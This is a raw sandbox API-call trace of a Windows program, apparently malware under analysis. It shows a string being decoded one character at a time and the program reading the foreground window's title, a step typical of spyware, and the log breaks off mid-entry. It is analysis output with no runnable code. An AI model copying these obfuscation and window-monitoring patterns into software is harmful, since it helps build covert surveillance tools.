[0179.290] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.294] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0179.294] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.294] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0179.295] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.295] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.295] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0179.295] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.296] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0179.296] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.297] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.297] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0179.297] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.298] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.298] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.298] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.298] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.299] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.299] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.299] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0179.300] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.300] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.301] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.301] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.301] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.301] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.302] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.302] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0179.302] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.303] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.303] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.304] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.304] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.304] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.304] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.305] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0179.305] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.305] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.305] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.305] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.306] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.306] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0179.306] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.354] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.354] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0179.354] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.354] GetForegroundWindow () returned 0x1011a [0179.354] GetLastError () returned 0x0 [0179.355] SysStringLen (param_1=" ") returned 0xff [0179.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0179.355] SysStringLen (param_1=" ") returned 0xff [0179.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0179.355] GetWindowTextA (in: hWnd=0x1011a, lpString=0x11644c4, nMaxCount=255 | out: lpString="FolderView") returned 10 [0179.355] GetLastError () returned 0x0 [0179.355] SysStringByteLen (bstr="潆摬牥楖睥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0179.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0179.356] SysStringByteLen (bstr="潆摬牥楖睥 ††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0179.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="FolderView") returned 256 [0179.356] SysStringLen (param_1="FolderView") returned 0xb [0179.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FolderView", cchWideChar=12, lpMultiByteStr=0x116859c, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FolderView", lpUsedDefaultChar=0x0) returned 12 [0179.356] SetWindowTextA (hWnd=0x103c4, lpString="FolderView") returned 1 [0179.356] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0179.357] GetFocus () returned 0x0 [0179.357] lstrlenA (lpString="FolderView") returned 10 [0179.357] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116859c) returned 0x1 [0179.357] IsWindow (hWnd=0x103c4) returned 1 [0179.357] IsWindow (hWnd=0x103c4) returned 1 [0179.357] IsWindow (hWnd=0x103c4) returned 1 [0179.358] IsWindow (hWnd=0x103c4) returned 1 [0179.358] GetFocus () returned 0x0 [0179.358] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xa [0179.358] GetFocus () returned 0x0 [0179.358] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0xb) returned 0x10e1d20 [0179.358] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0xb, lParam=0x10e1d20) returned 0xa [0179.358] GetFocus () returned 0x0 [0179.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0179.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="FolderView", cbMultiByte=-1, lpWideCharStr=0x116859c, cchWideChar=11 | out: lpWideCharStr="FolderView") returned 11 [0179.359] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10e1d20 | out: hHeap=0x10d0000) returned 1 [0179.359] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0179.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.360] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.360] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0179.360] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.361] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0179.361] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.362] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.362] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0179.362] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.363] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0179.363] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.364] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0179.364] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.365] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0179.365] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.365] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0179.366] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.366] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0179.366] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.367] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.367] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0179.367] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.368] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0179.368] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.370] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0179.370] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.371] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0179.371] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.371] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.372] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.372] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.372] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", 